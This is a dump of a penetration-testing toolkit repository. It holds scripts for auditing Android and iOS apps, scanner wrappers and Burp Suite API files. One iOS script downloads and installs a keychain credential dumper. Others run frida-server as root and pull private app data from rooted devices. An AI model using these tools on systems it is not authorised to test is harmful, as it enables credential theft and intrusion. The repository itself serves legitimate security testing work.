├── .gitignore ├── poc └── libc │ ├── version │ ├── Makefile │ └── libc.c ├── swfdecrypt_w32_unix.cpp ├── android ├── strace │ ├── strace-4.8-arm-bin.tgz │ ├── strace-4.8-arm-bin │ │ ├── strace │ │ ├── strace-log-merge │ │ └── strace-graph │ └── install_strace.sh ├── screenshot.sh ├── dump_preferences.sh ├── frida-android.sh ├── tcpdump │ └── install_tcpdump.sh ├── logcat.sh ├── android-app-data-pull.sh ├── dump_sqlite.sh └── mystrace.sh ├── scripts ├── frida-run.sh ├── nikto.sh ├── tcpdump_screen.sh ├── dirb.sh ├── makezip.py ├── find-rpath.sh ├── frida-gadgets-download.sh ├── conntrack-watcher.sh ├── pageload_benchmark.sh └── extinf.sh ├── burpsuite ├── extensions │ ├── base64 │ │ ├── Makefile │ │ ├── burp │ │ │ ├── IScopeChangeListener.java │ │ │ ├── IIntruderAttack.java │ │ │ ├── IHttpRequestResponsePersisted.java │ │ │ ├── ITempFile.java │ │ │ ├── IExtensionStateListener.java │ │ │ ├── IBurpExtender.java │ │ │ ├── IScannerListener.java │ │ │ ├── IHttpService.java │ │ │ ├── ITab.java │ │ │ ├── IMenuItemHandler.java │ │ │ ├── IProxyListener.java │ │ │ ├── IContextMenuFactory.java │ │ │ ├── IScannerInsertionPointProvider.java │ │ │ ├── IHttpListener.java │ │ │ ├── IIntruderPayloadGeneratorFactory.java │ │ │ ├── IMessageEditorTabFactory.java │ │ │ ├── ICookie.java │ │ │ ├── IResponseInfo.java │ │ │ ├── IHttpRequestResponseWithMarkers.java │ │ │ ├── IIntruderPayloadProcessor.java │ │ │ ├── IIntruderPayloadGenerator.java │ │ │ ├── IMessageEditorController.java │ │ │ ├── IMessageEditor.java │ │ │ ├── ISessionHandlingAction.java │ │ │ ├── IScanQueueItem.java │ │ │ ├── IRequestInfo.java │ │ │ ├── ITextEditor.java │ │ │ ├── IHttpRequestResponse.java │ │ │ ├── IParameter.java │ │ │ ├── IInterceptedProxyMessage.java │ │ │ ├── IMessageEditorTab.java │ │ │ ├── IScanIssue.java │ │ │ ├── IScannerCheck.java │ │ │ ├── IContextMenuInvocation.java │ │ │ ├── IScannerInsertionPoint.java │ │ │ └── IExtensionHelpers.java │ │ └── BurpExtender.java │ ├── RandomUUID.py │ └── HTTPInjector.py ├── burp_item.xml ├── mkBurpExtension.sh ├── burp_item2appendix.py ├── burp.sh ├── burp_issue2appendix.py └── burp_item2web.py ├── sqlmap └── sqlmap_csrf_bypass.py ├── ios ├── install-iRET-deps.sh ├── install_pentest_iOS_env.sh └── iOSaudit.sh ├── nmap ├── vulnmap.py ├── nmap.sh └── http-ms15-034.nse ├── drozer ├── secure_random.py └── object_input_stream.py ├── ms15-034 ├── ms15-034.c └── CVE-2015-1635.py └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | decrypt_contagio_sample.sh 2 | -------------------------------------------------------------------------------- /poc/libc/version: -------------------------------------------------------------------------------- 1 | GLIBC_2.0{ 2 | global:__libc_start_main; 3 | local: *; 4 | }; 5 | -------------------------------------------------------------------------------- /swfdecrypt_w32_unix.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/libcrack/pentest/HEAD/swfdecrypt_w32_unix.cpp -------------------------------------------------------------------------------- /android/strace/strace-4.8-arm-bin.tgz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/libcrack/pentest/HEAD/android/strace/strace-4.8-arm-bin.tgz -------------------------------------------------------------------------------- /android/strace/strace-4.8-arm-bin/strace: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/libcrack/pentest/HEAD/android/strace/strace-4.8-arm-bin/strace -------------------------------------------------------------------------------- /poc/libc/Makefile: -------------------------------------------------------------------------------- 1 | CC := gcc 2 | LDFLAGS := -Wl,--version-script=version 3 | CFLAGS := -fPIC -shared -static-libgcc 4 | 5 | libc.so.6: libc.c version 6 | $(CC) $(CFLAGS) $(LDFLAGS) $< -o $@ 7 | 8 | clean: libc.so.6 9 | rm $< 10 | -------------------------------------------------------------------------------- /scripts/frida-run.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | FRIDA_HOME=~/frida 4 | #FRIDA_GADGET_ENV=development 5 | FRIDA_GADGET_SCRIPT="${FRIDA_HOME}/myhook.js" 6 | LD_PRELOAD="${FRIDA_HOME}/android/arm64/lib/frida-gadget.so" 7 | 8 | frida-ps 9 | -------------------------------------------------------------------------------- /poc/libc/libc.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int __libc_start_main(int (*main) (int, char **, char **), int argc, 5 | char ** ubp_av, void (*init) (void), void (*fini) (void), 6 | void (*rtld_fini) (void), void (* stack_end)) 7 | { 8 | printf("Hello world\n"); 9 | return 0; 10 | } 11 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | @echo "[*] Compiling burp extension base64" 3 | @javac BurpExtender.java 4 | @echo "[*] Creating base64.jar" 5 | @mv *.class burp/ 6 | @jar -cf base64.jar burp/BurpExtender*.class 7 | @echo "[*] Execute \"java -cp base64.jar:burpsuite_pro_v1.5.20.jar burp.StartBurp\" to start burp" 8 | clean: 9 | @echo "[*] Cleaning base64" 10 | @rm burp/*.class 11 | @rm base64.jar 12 | -------------------------------------------------------------------------------- /android/screenshot.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # devnull@libcrack.so 3 | # Take an screenshot of 4 | # a device's screen 5 | 6 | fecha=$(date "+%d%m%Y_%H%M%S") 7 | imgfile="/sdcard/screenshot_${fecha}.png" 8 | 9 | echo "[*] Creating ${imgfile}" 10 | adb shell /system/bin/screencap -p "${imgfile}" 11 | 12 | echo "[*] Pulling ${imgfile}" 13 | adb pull "${imgfile}" $(basename "${imgfile}") 14 | 15 | echo "[*] Deleting ${imgfile}" 16 | adb shell rm "${imgfile}" 17 | 18 | -------------------------------------------------------------------------------- /android/dump_preferences.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # devnull@libcrack.so 3 | # Dump android preferences.xml 4 | 5 | if [ -z "$1" ]; then 6 | echo "Usage: $0 " 7 | echo 8 | exit -1 9 | fi 10 | 11 | 12 | app="$1" 13 | d="/data/data/${app}/" 14 | l=" 15 | shared_prefs/test1.xml 16 | shared_prefs/test2.xml 17 | shared_prefs/test3.xml 18 | " 19 | 20 | for i in $l; do 21 | echo 22 | echo "* File $d/$i" 23 | echo "" 24 | cat "$i" 25 | echo "" 26 | echo 27 | done 28 | -------------------------------------------------------------------------------- /scripts/nikto.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | set -e 4 | 5 | host="$1" 6 | proxy="" 7 | port=443 8 | ssl="-ssl" 9 | cmd="$(which nikto)" 10 | output="nikto-${host}.log" 11 | 12 | if [ -z "$1" ]; then echo "Usage: $0 "; exit 1; fi 13 | if [ ! -z "$PROXY" ]; then proxy="${PROXY}"; fi 14 | 15 | "$cmd" -host "$host" -port "$port" -output "$output" -Format xml "$ssl" \ 16 | && printf "\e[32m[*]\e[0m ${cmd} finished\e[0m\n" \ 17 | || printf "\e[31m[*]\e[0m ${cmd} failed\e[0m\n" 18 | 19 | exit $? 20 | -------------------------------------------------------------------------------- /scripts/tcpdump_screen.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | test -z "$1" && echo "Usage: $0 IP" && exit 1 4 | 5 | ip="$1" 6 | date=$(date "+%d%m%Y_%H%M%S") 7 | pcap="${taskid}_${date}.pcap" 8 | screenid="tcpdump_${taskid}_${date}" 9 | screencmd="tcpdump -w $pcap -i $iface host $ip" 10 | iface="eth0" 11 | 12 | echo ">> Capturing traffic $ip to $pcap on $iface " 13 | screen -d -m -S "$screenid" \ 14 | tcpdump -w "$pcap" -i "$iface" "host $ip" \ 15 | || echo "ERROR creating screen" 16 | sleep 0.5 17 | echo -n ">> Screen: " 18 | screen -ls | grep "$screenid" | awk '{print $1}' 19 | 20 | -------------------------------------------------------------------------------- /scripts/dirb.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | set -e 4 | 5 | host="$1" 6 | proxy="" 7 | cmd="$(which dirb)" 8 | output="dirb-${host}.log" 9 | dirb_wordlists="/usr/share/dirb/wordlists" 10 | 11 | if [ -z "$1" ]; then echo "Usage: $0 "; exit 1; fi 12 | if [ ! -z "$PROXY" ]; then proxy="${PROXY}"; fi 13 | 14 | "$cmd" https://"$host" \ 15 | "${dirb_wordlists}"/{indexes,vulns/{tomcat,iplanet,apache}}.txt \ 16 | -p "$proxy" \ 17 | -o "$output" \ 18 | && printf "\e[32m[*]\e[0m ${cmd} finished\e[0m\n" \ 19 | || printf "\e[31m[*]\e[0m ${cmd} failed\e[0m\n" 20 | 21 | exit $? 22 | -------------------------------------------------------------------------------- /burpsuite/burp_item.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | fpngsemployeete13.fnzc.co.uk 5 | 443 6 | https 7 | GET 8 | 9 | null 10 | 11 | 302 12 | 492 13 | HTML 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /scripts/makezip.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | # devnull@libcrack.so 4 | # Sat Oct 8 13:45:22 CEST 2016 5 | 6 | import struct 7 | 8 | filename = "file.zip" 9 | payload = "" 10 | 11 | zipcontent = "\x50\x4b\x05\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 12 | zipcontent += struct.pack("H",len(payload)) 13 | zipcontent += payload 14 | 15 | print("Creating file {0}".format(filename)) 16 | fp = open(filename, 'w+') 17 | 18 | print("Writing payload") 19 | fp.write(zipcontent) 20 | 21 | print("Closing {0}".format(filename)) 22 | fp.close() 23 | 24 | print ("Done") 25 | -------------------------------------------------------------------------------- /scripts/find-rpath.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # libcrack.so 3 | # jue ago 4 22:17:54 CEST 2016 4 | 5 | FINDROOT="$1" 6 | 7 | [[ ! -d $FINDROOT || -z "$FINDROOT" ]] && { 8 | printf "\e[31mError:\e[0m argv1: No such directory: \"$FINDROOT\"\n" 9 | exit 1 10 | } 11 | 12 | printf "[*] Finding RPATH affected binaries in \e[1m\"$FINDROOT\"\e[0m\n" 13 | 14 | for f in $(find $FINDROOT -executable); do 15 | readelf -d "$f" 2>/dev/null | /bin/grep -q "PATH" && { 16 | rpath="$(readelf -d "$f" | grep RPATH)" 17 | printf "[*] Found RPATH $f: \e[0;91m${rpath}\e[0m\n" 18 | } 19 | done 20 | 21 | printf "[*] Done\n" 22 | 23 | exit 0 24 | -------------------------------------------------------------------------------- /android/frida-android.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # mar sep 9 02:12:51 CEST 2014 3 | # root@libcrack.so 4 | 5 | LPORT1=tcp:27042 6 | LPORT2=tcp:27043 7 | TMP=/data/local/tmp 8 | FRIDA_ANDROID_URL=http://build.frida.re/frida/android/bin/frida-server 9 | 10 | curl -s -O "${FRIDA_ANDROID_URL}" 11 | chmod +x frida-server 12 | adb push frida-server "${TMP}/" 13 | 14 | # 27042 is the port used for communicating with frida-server 15 | # and each subsequent port is required for each of the next 16 | # processes you inject into. 17 | 18 | adb forward "${LPORT1}" "${LPORT1}" 19 | adb forward "${LPORT2}" "${LPORT2}" 20 | 21 | adb shell su -c "${TMP}/frida-server" -t 0 22 | 23 | frida-ps -R 24 | 25 | exit $? 26 | -------------------------------------------------------------------------------- /android/strace/install_strace.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # devnull@libcrack.so 3 | # Install strace on an Android device 4 | 5 | # set -e 6 | set -o errexit 7 | # set -u 8 | set -o nounset 9 | 10 | binzip="strace.arm32_eabi5_stripped.gz" 11 | bin="strace" 12 | #bindir="/system/bin" 13 | bindir="/system/xbin" 14 | 15 | test -e "$binzip" || exit 1; 16 | 17 | gunzip -k -c "$binzip" > "$bin" 18 | adb push "$bin" "/sdcard/${bin}" 19 | adb shell su -c mount -o remount,rw /system 20 | adb shell su -c cp "/sdcard/${bin}" "${bindir}/${bin}" 21 | adb shell su -c chmod 0755 "${bindir}/${bin}" 22 | adb shell su -c rm "/sdcard/${bin}" 23 | adb shell su -c mount -o remount,ro /system 24 | rm "$bin" 25 | 26 | echo "${bindir}/${bin}" installed 27 | 28 | -------------------------------------------------------------------------------- /android/tcpdump/install_tcpdump.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # devnull@libcrack.so 3 | # Install tcpdump on an Android device 4 | 5 | set -e 6 | set -u 7 | 8 | bin="tcpdump" 9 | binzip="tcpdump.arm_eabi4_static.gz" 10 | path="/system/xbin" 11 | 12 | gunzip -k -c "${binzip}" > "${bin}" 13 | adb push "${bin}" /sdcard/ 14 | adb shell su -c mount -o remount,rw /system 15 | adb shell su -c cp "/sdcard/${bin}" "${path}/${bin}" 16 | adb shell su -c chmod 0755 "${path}/${bin}" 17 | adb shell su -c chown root:shell "${path}/${bin}" 18 | #adb shell su -c mv /system/bin/sh /system/bin/sh0 19 | #adb shell su -c ln -s "${path}/${bin}" /system/bin/sh 20 | adb shell su -c mount -o remount,ro /system 21 | adb shell su -c rm "/sdcard/${bin}" 22 | 23 | rm "${bin}" 24 | echo "${path}/${bin}" installed 25 | 26 | -------------------------------------------------------------------------------- /scripts/frida-gadgets-download.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | urls=" 4 | https://build.frida.re/frida/mac/lib/FridaGadget.dylib 5 | https://build.frida.re/frida/ios/lib/FridaGadget.dylib 6 | https://build.frida.re/frida/android/arm/lib/frida-gadget.so 7 | https://build.frida.re/frida/android/arm64/lib/frida-gadget.so 8 | https://build.frida.re/frida/android/arm64/lib/frida-gadget.so 9 | https://build.frida.re/frida/linux/i386/lib/frida-gadget.so 10 | https://build.frida.re/frida/linux/x86_64/lib/frida-gadget.so 11 | " 12 | outdir="frida-gadgets" 13 | test -d "${outdir}" || mkdir -p "${outdir}" 14 | 15 | for url in $urls; do 16 | out="${outdir}/$(echo -n ${url}|cut -f5- -d/)" 17 | test -d "$(dirname "${out}")" || mkdir -p "${_}" 18 | wget -k -L "${url}" -O "${out}" 19 | done 20 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IScopeChangeListener.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IScopeChangeListener.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerScopeChangeListener() to register 15 | * a scope change listener. The listener will be notified whenever a change 16 | * occurs to Burp's suite-wide target scope. 17 | */ 18 | public interface IScopeChangeListener 19 | { 20 | /** 21 | * This method is invoked whenever a change occurs to Burp's suite-wide 22 | * target scope. 23 | */ 24 | void scopeChanged(); 25 | } 26 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IIntruderAttack.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IIntruderAttack.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used to hold details about an Intruder attack. 14 | */ 15 | public interface IIntruderAttack 16 | { 17 | /** 18 | * This method is used to retrieve the HTTP service for the attack. 19 | * 20 | * @return The HTTP service for the attack. 21 | */ 22 | IHttpService getHttpService(); 23 | 24 | /** 25 | * This method is used to retrieve the request template for the attack. 26 | * 27 | * @return The request template for the attack. 28 | */ 29 | byte[] getRequestTemplate(); 30 | 31 | } 32 | -------------------------------------------------------------------------------- /android/logcat.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # devnull@libcrack.so 3 | # Android LogCat Wrapper 4 | 5 | avd="unknown" 6 | test -z "$1" && avd="android" 7 | 8 | pcapdir="../pcap" 9 | logdir="../logs" 10 | pcapfile="${pcapdir}/${avd}.$$.${RANDOM}.pcap" 11 | logfile="${logdir}/${avd}.$$.${RANDOM}.logcat" 12 | 13 | ignore='SFPerfTracer|TraceEventNetworkController|dalvikvm|WifiStateMachine|WifiP2pService|wpa_supplicant|qdhwcomposer|CydiaSubstrate|AlarmManager|MDMCTBK|ConnectivityService|Nat464Xlat|ModemStatsDSDetect|audio_hw_primary|audio_hw_extn|msm8974_platfor|Laser|NetworkController|Adreno-EGL|WifiService|BluetoothManagerService|BluetoothAdapter|Trace|SFPerfTracer' 14 | 15 | test -d ${pcapdir} || mkdir -p ${pcapdir} 16 | test -d ${logdir} || mkdir -p ${logdir} 17 | 18 | ps aux | grep -q "adb logcat" && { 19 | echo "[*] CARE logcat already running" 20 | } 21 | 22 | echo "adb logcat >> ${logfile} 2>&1 &" 23 | echo "tail -f ${logfile} | egrep -h -v "$ignore" | logcat-colorize" 24 | #| egrep 'dreamteam|chromium|Console|INFO:CONSOLE|System.out' \ 25 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IHttpRequestResponsePersisted.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IHttpRequestResponsePersisted.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used for an 14 | * IHttpRequestResponse object whose request and response messages 15 | * have been saved to temporary files using 16 | * IBurpExtenderCallbacks.saveBuffersToTempFiles(). 17 | */ 18 | public interface IHttpRequestResponsePersisted extends IHttpRequestResponse 19 | { 20 | /** 21 | * This method is used to permanently delete the saved temporary files. It 22 | * will no longer be possible to retrieve the request or response for this 23 | * item. 24 | */ 25 | void deleteTempFiles(); 26 | } 27 | -------------------------------------------------------------------------------- /scripts/conntrack-watcher.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # devnull@libcrack.so 3 | # dom ago 31 04:17:57 CEST 2014 4 | 5 | [[ "$(whoami)" == "root" ]] || { 6 | echo "Got root?" 7 | exit 1 8 | } 9 | 10 | #maximun="$(sysctl -n net.ipv4.netfilter.ip_conntrack_max)" 11 | maximun="$(sysctl -n net.nf_conntrack_max)" 12 | current="$(conntrack -C)" 13 | thresold="$(($maximun/4 * 3))" 14 | date=$(date "+%d/%m/%Y %H:%M:%S") 15 | 16 | rcpt="CHANGEME@EMAIL.COM" 17 | subject="ALERT: Connection tracking thresold reached" 18 | msg="maximun=$maximun current=$current thresold=$thresold" 19 | body="\n$date\t$msg\n\n$(conntrack -C)\n\n$(conntrack -S)\n" 20 | 21 | logtag="conntrack" 22 | 23 | mailalert(){ echo -e "$body" | mail -s "$subject" "$rcpt"; } 24 | 25 | if [[ $current > $thresold ]]; then 26 | logger --stderr --tag "$logtag" --priority daemon.alert "$subject" 27 | logger --stderr --tag "$logtag" --priority daemon.alert "$msg" 28 | mailalert 29 | else 30 | logger --stderr --tag "$logtag" --priority daemon.info "$msg" 31 | fi 32 | 33 | exit 0 34 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/ITempFile.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)ITempFile.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used to hold details of a temporary file that has been 14 | * created via a call to 15 | * IBurpExtenderCallbacks.saveToTempFile(). 16 | * 17 | */ 18 | public interface ITempFile 19 | { 20 | /** 21 | * This method is used to retrieve the contents of the buffer that was saved 22 | * in the temporary file. 23 | * 24 | * @return The contents of the buffer that was saved in the temporary file. 25 | */ 26 | byte[] getBuffer(); 27 | 28 | /** 29 | * This method is used to permanently delete the temporary file when it is 30 | * no longer required. 31 | */ 32 | void delete(); 33 | } 34 | -------------------------------------------------------------------------------- /android/android-app-data-pull.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # mar jun 14 18:54:23 CEST 2016 3 | 4 | appname="$1" 5 | 6 | [[ -z "$appname" ]] && { 7 | printf "\e[31mUsage:\e[0m $0 \n" 8 | exit 1 9 | } 10 | 11 | tmpdir="/data/local/tmp" 12 | date="$(date "+%d%m%Y_%H%M%S")" 13 | 14 | newname="${appname}-${date}" 15 | appdir="/data/data/${appname}" 16 | 17 | device="$(adb devices | grep '^[a-z0-9]' | awk '{print $1}')" 18 | 19 | [[ -z "$device" ]] && { 20 | printf "\e[32mERROR:\e[0m Cannot find adb device\n" 21 | exit 1 22 | } 23 | 24 | printf "\e[32m[+]\e[0m Copy ${appdir} to a temp location\n" 25 | adb shell su -c "cp -r "${appdir}" "${tmpdir}"" 26 | 27 | printf "\e[32m[+]\e[0m Setting temp permissions on ${tmpdir}/${appname}\n" 28 | adb shell su -c "chown -R shell:shell "${tmpdir}/${appname}"" 29 | 30 | printf "\e[32m[+]\e[0m Pulling ${appname} files\n" 31 | adb pull "${tmpdir}/${appname}" "${newname}" 32 | 33 | printf "\e[32m[+]\e[0m Deleting ${tmpdir}/${appname}\n" 34 | adb shell su -c "rm -rf "${tmpdir}/${appname}"" 35 | 36 | printf "\e[32m[+]\e[0m Done\n" 37 | sleep 5 38 | 39 | exit $? 40 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IExtensionStateListener.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IExtensionStateListener.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerExtensionStateListener() to 15 | * register an extension state listener. The listener will be notified of 16 | * changes to the extension's state. Note: Any extensions that start 17 | * background threads or open system resources (such as files or database 18 | * connections) should register a listener and terminate threads / close 19 | * resources when the extension is unloaded. 20 | */ 21 | public interface IExtensionStateListener 22 | { 23 | /** 24 | * This method is called when the extension is unloaded. 25 | */ 26 | void extensionUnloaded(); 27 | } 28 | -------------------------------------------------------------------------------- /android/strace/strace-4.8-arm-bin/strace-log-merge: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | show_usage() 4 | { 5 | cat <<__EOF__ 6 | Usage: ${0##*/} STRACE_LOG 7 | 8 | Finds all STRACE_LOG.PID files, adds PID prefix to every line, 9 | then combines and sorts them, and prints result to standard output. 10 | 11 | It is assumed that STRACE_LOGs were produced by strace with -tt[t] 12 | option which prints timestamps (otherwise sorting won't do any good). 13 | __EOF__ 14 | } 15 | 16 | if [ $# -ne 1 ]; then 17 | show_usage >&2 18 | exit 1 19 | elif [ "$1" = '--help' ]; then 20 | show_usage 21 | exit 0 22 | fi 23 | 24 | logfile=$1 25 | 26 | for file in "$logfile".*; do 27 | [ -f "$file" ] || continue 28 | suffix=${file#"$logfile".} 29 | [ "$suffix" -gt 0 ] 2> /dev/null || 30 | continue 31 | pid=$(printf "%-5s" $suffix) 32 | # Some strace logs have last line which is not '\n' terminated, 33 | # so add extra newline to every file. 34 | # grep -v '^$' removes empty lines which may result. 35 | sed "s/^/$pid /" < "$file" 36 | echo 37 | done \ 38 | | sort -s -k2,2 | grep -v '^$' 39 | 40 | rc=$? 41 | [ $rc -eq 1 ] && 42 | echo >&2 "${0##*/}: $logfile: strace output not found" 43 | exit $rc 44 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IBurpExtender.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IBurpExtender.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * All extensions must implement this interface. 14 | * 15 | * Implementations must be called BurpExtender, in the package burp, must be 16 | * declared public, and must provide a default (public, no-argument) 17 | * constructor. 18 | */ 19 | public interface IBurpExtender 20 | { 21 | /** 22 | * This method is invoked when the extension is loaded. It registers an 23 | * instance of the 24 | * IBurpExtenderCallbacks interface, providing methods that may 25 | * be invoked by the extension to perform various actions. 26 | * 27 | * @param callbacks An 28 | * IBurpExtenderCallbacks object. 29 | */ 30 | void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks); 31 | } 32 | -------------------------------------------------------------------------------- /sqlmap/sqlmap_csrf_bypass.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # 3 | # python2 ./sqlmap.py -l post_request.txt \ 4 | # -v 6 --level=5 --risk=2 \ 5 | # --eval="import csrf; Serial=csrf.getCSRF()" 6 | # 7 | 8 | import httplib 9 | from StringIO import StringIO 10 | import gzip 11 | 12 | from lxml import html 13 | 14 | def getCSRF(): 15 | conn = httplib.HTTPSConnection("www.w3schools.com") 16 | headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", 17 | "Accept-Language": "en-US,en;q=0.5", 18 | "Accept-Encoding": "gzip, deflate", 19 | "Referer": "https://www.w3schools.com/tags/demo_form.asp", 20 | "Connection": "keep-alive" 21 | } 22 | 23 | conn.request("GET", "/tags/demo.asp", None, headers) 24 | resp = conn.getresponse() 25 | buffer = StringIO(resp.read()) 26 | deflatedContent = gzip.GzipFile(fileobj=buffer) 27 | content_text = deflatedContent.read() 28 | content_tree = html.fromstring(content_text) 29 | csrf_token = content_tree.xpath('//input[@name="csrf"]/@value') 30 | conn.close() 31 | 32 | return csrf_token[0] 33 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IScannerListener.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IScannerListener.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerScannerListener() to register a 15 | * Scanner listener. The listener will be notified of new issues that are 16 | * reported by the Scanner tool. Extensions can perform custom analysis or 17 | * logging of Scanner issues by registering a Scanner listener. 18 | */ 19 | public interface IScannerListener 20 | { 21 | /** 22 | * This method is invoked when a new issue is added to Burp Scanner's 23 | * results. 24 | * 25 | * @param issue An 26 | * IScanIssue object that the extension can query to obtain 27 | * details about the new issue. 28 | */ 29 | void newScanIssue(IScanIssue issue); 30 | } 31 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IHttpService.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IHttpService.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used to provide details about an HTTP service, to which 14 | * HTTP requests can be sent. 15 | */ 16 | public interface IHttpService 17 | { 18 | /** 19 | * This method returns the hostname or IP address for the service. 20 | * 21 | * @return The hostname or IP address for the service. 22 | */ 23 | String getHost(); 24 | 25 | /** 26 | * This method returns the port number for the service. 27 | * 28 | * @return The port number for the service. 29 | */ 30 | int getPort(); 31 | 32 | /** 33 | * This method returns the protocol for the service. 34 | * 35 | * @return The protocol for the service. Expected values are "http" or 36 | * "https". 37 | */ 38 | String getProtocol(); 39 | } 40 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/ITab.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)ITab.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.awt.Component; 13 | 14 | /** 15 | * This interface is used to provide Burp with details of a custom tab that will 16 | * be added to Burp's UI, using a method such as 17 | * IBurpExtenderCallbacks.addSuiteTab(). 18 | */ 19 | public interface ITab 20 | { 21 | /** 22 | * Burp uses this method to obtain the caption that should appear on the 23 | * custom tab when it is displayed. 24 | * 25 | * @return The caption that should appear on the custom tab when it is 26 | * displayed. 27 | */ 28 | String getTabCaption(); 29 | 30 | /** 31 | * Burp uses this method to obtain the component that should be used as the 32 | * contents of the custom tab when it is displayed. 33 | * 34 | * @return The component that should be used as the contents of the custom 35 | * tab when it is displayed. 36 | */ 37 | Component getUiComponent(); 38 | } 39 | -------------------------------------------------------------------------------- /ios/install-iRET-deps.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # devnull@libcrack.so 3 | # Installs iRET on a iOS device 4 | 5 | apt-get install com.ericasadun.utilities 6 | apt-get install adv-cmds 7 | apt-get install org.coolstar.iostoolchain 8 | apt-get install python 9 | apt-get install file 10 | # MAL wget http://iphone-dataprotection.googlecode.com/files/keychain_dump 11 | 12 | # git clone https://github.com/ptoomey3/Keychain-Dumper.git 13 | wget --no-check-certificate \ 14 | https://github.com/ptoomey3/Keychain-Dumper/raw/master/keychain_dumper \ 15 | -O /usr/bin/keychain_dumper 16 